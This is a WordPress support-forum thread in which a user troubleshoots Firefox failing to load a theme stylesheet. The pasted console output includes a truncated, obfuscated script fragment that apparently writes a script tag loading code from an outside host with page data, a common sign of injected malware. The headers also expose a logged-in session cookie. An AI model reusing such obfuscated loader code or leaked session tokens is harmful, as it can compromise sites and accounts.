WordPress.org

Ready to get started?Download WordPress

Forums

Firefox is not loading stylesheet (4 posts)

  1. kamikazekent
    Member
    Posted 1 year ago #

    I have done a lot of research at this point and I am completely lost as to what to try next. My stylesheet is working fine in IE and in Chrome, but isn't loading/rendering in Firefox. I'm enqueuing the stylesheet in functions.php like so:

    wp_enqueue_style( 'style', get_stylesheet_uri() );

    Which ends up showing in the header HTML as:

    <link id="style-css" media="all" type="text/css" href="http://localhost/wordpress/wp-content/themes/aou/style.css?ver=3.5" rel="stylesheet">

    Troubleshooting steps so far

    1. Added AddType text/css .css into my .htaccess file
    2. Set default_mimetype = "css/html" in php.ini
    3. Validated (as much as possible) my css.
    4. Web console output checked:
      `[19:31:14.943] Unknown property 'box-sizing'. Declaration dropped. @ http://localhost/wordpress/wp-includes/css/admin-bar.min.css?ver=3.5:1
      [19:31:14.943] Error in parsing value for 'background-image'. Declaration dropped. @ http://localhost/wordpress/wp-includes/css/admin-bar.min.css?ver=3.5:1
      [19:31:14.943] Unknown pseudo-class or pseudo-element '-webkit-input-placeholder'. Ruleset ignored due to bad selector. @ http://localhost/wordpress/wp-includes/css/admin-bar.min.css?ver=3.5:1
      [19:31:14.944] Expected media feature name but found '-o-min-device-pixel-ratio'. @ http://localhost/wordpress/wp-includes/css/admin-bar.min.css?ver=3.5:1
      [19:31:14.944] Expected media feature name but found '-webkit-min-device-pixel-ratio'. @ http://localhost/wordpress/wp-includes/css/admin-bar.min.css?ver=3.5:1
      [19:31:14.989] Unknown property '-moz-opacity'. Declaration dropped. @ http://localhost/wordpress/wp-content/plugins/social-media-widget/social_widget.css:56
      [19:31:15.259] Unknown property '-moz-opacity'. Declaration dropped. @ http://localhost/wordpress/
      [19:31:15.369] Unknown property 'box-sizing'. Declaration dropped. @ http://localhost/wordpress/`
    5. Error console checked:
      `Timestamp: 1/11/2013 7:31:15 PM
      Error: SyntaxError: identifier starts immediately after numeric literal
      Source File: http://localhost/wordpress/
      Line: 30
      Source Code:
      0.f('<2'+'3 5="6/7" 8="9://a.b/e/o/g?d='+0.h+'&i='+j(0.k)+'&`
    6. Here is the info Firebug gives me:
      [20:13:01.305] GET http://localhost/wordpress/wp-content/themes/aou/style.css?ver=3.5 [HTTP/1.1 200 OK 8ms]
      response header
      HTTP/1.1 206 Partial Content
      Date: Sat, 12 Jan 2013 02:31:14 GMT
      Server: Apache/2.4.2 (Win64) PHP/5.4.3
      Last-Modified: Sat, 12 Jan 2013 01:46:47 GMT
      Etag: "16654-4d30d95c04772"
      Accept-Ranges: bytes
      Content-Length: 91220
      Content-Range: bytes 512-91731/91732
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/css

      request header
      GET /wordpress/wp-content/themes/aou/style.css?ver=3.5 HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
      Accept: text/css,*/*;q=0.1
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Connection: keep-alive
      Referer: http://localhost/wordpress/
      Cookie: wp-settings-time-1=1357954254; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=kkingdon%7C1358127053%7C38aeae942b32cf1a34f8c2d8f6f1e533; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse%26wplink%3D1%26align%3Dnone%26imgsize%3Dfull%26urlbutton%3Dpost
      Range: bytes=512-
      If-Range: "16654-4d30d95c04772"
      Cache-Control: max-age=0

      Please let me know if I need to give any other information in order to resolve this.

  2. kamikazekent
    Member
    Posted 1 year ago #

    I have a test page up now too. I've had several people test and they all experience the same issue.

    Test Page

  3. Latka
    Member
    Posted 1 year ago #

    confirmed, you are correct on this matter. I just checked using IE and FF and FF will not load the style sheets. One thing that I can add to the discussion, although it may be an insignificant point: is that when I disabled noscript some of the styles changed, text became bigger etc. and some of the colours appeared (as opposed to a white background) however the site was still a mess on FF so you may want to disable all and any plugins (I am talking about firefox plugins not wordpress plugins) and see if that works. If that is the case and it is plugin interference then you need a snippet of code to work around that, however I am no expert on these matters of coding so its just a thought, but try disabling all your firefox plugins

  4. kamikazekent
    Member
    Posted 1 year ago #

    I experience the same outcome when disabling all add-ons, but I still haven't found a solution to the issue at large. Would someone be willing to take a look at my code? There's some typos that I've fixed on my local server and I've gotten rid of any errors besides unrecognized CSS properties and I have yet to make any progress.

Topic Closed

This topic has been closed to new replies.

About this Topic